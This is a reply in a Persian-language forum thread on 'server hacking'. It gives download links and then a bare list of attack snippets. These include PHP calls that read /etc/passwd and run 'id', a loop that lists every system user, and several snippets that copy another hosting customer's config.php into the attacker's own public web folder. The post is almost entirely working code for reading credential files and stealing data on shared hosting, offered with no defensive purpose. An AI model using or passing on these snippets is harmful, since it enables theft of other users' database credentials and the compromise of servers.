RE: :: تاپیک آموزش سرور هکینگ ::
اموزش موجوده!
سرور پرشین گیگ از دسترس خارج شده!
اموزش موجوده!
سرور پرشین گیگ از دسترس خارج شده!
http://www.uplooder.net/cgi-bin/dl.cgi?key=7e5e9d66cc1842d8810cb3efdb1a057b http://www.uplooder.net/cgi-bin/dl.cgi?key=b9e13925aed9fc78de389349ca9edef8 http://www.uplooder.net/cgi-bin/dl.cgi?key=fe684544770e928c57588999c3377b2d
C:\Windows\System32\cmd.exe
echo passthru("cat /etc/passwd"); echo exec("cat /etc/passwd"); echo shell_exec("cat /etc/passwd");
xxd /etc/passwd rev /etc/passwd tac /etc/passwd more /etc/passwd less /etc/passwd cat /etc/passwd
<?php for($uid=0;$uid<60000;$uid++){ $ara = @posix_getpwuid($uid); if (!empty($ara)) { while (list ($key, $val) = each($ara)){ print "$val:"; } print "\n"; }}?>
<?php echo exec('id'); ?>
<?php echo file_get_contents('/etc/passwd'); ?>
<?php chmod('cgi.pl ', 0755); mkdir('test', 0755, true); ?>
<?php $source = '/home/targetuser/public_html/config.php'; $destination = '/home/myuser/public_html/irh.txt'; $data = file_get_contents($source); $handle = fopen($destination, "w"); fwrite($handle, $data); fclose($handle); ?>
<?php echo copy("/etc/passwd","/home/myuser/public_html/irh.txt"); ?>
<?php echo copy("/home/targetuser/public_html/config.php","/home/myuser/public_html/irh.txt"); ?>
<?php $srcfile='/home/targetuser/public_html/config.php'; $dstfile='/home/myuser/public_html/irh.txt'; mkdir(dirname($dstfile), 0777, true); copy($srcfile, $dstfile); ?>
نظر